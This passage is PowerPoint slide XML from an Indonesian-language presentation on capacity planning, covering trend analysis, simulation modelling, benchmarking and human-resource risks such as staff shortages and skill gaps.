              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkirakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemacetan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemodelan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diantisipasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembandingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbandingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembandingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditingkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keunggulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompetitif</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158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302662089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Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kapasitas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Daya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kapasitas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterampilan</a:t>
            </a:r>
            <a:r>
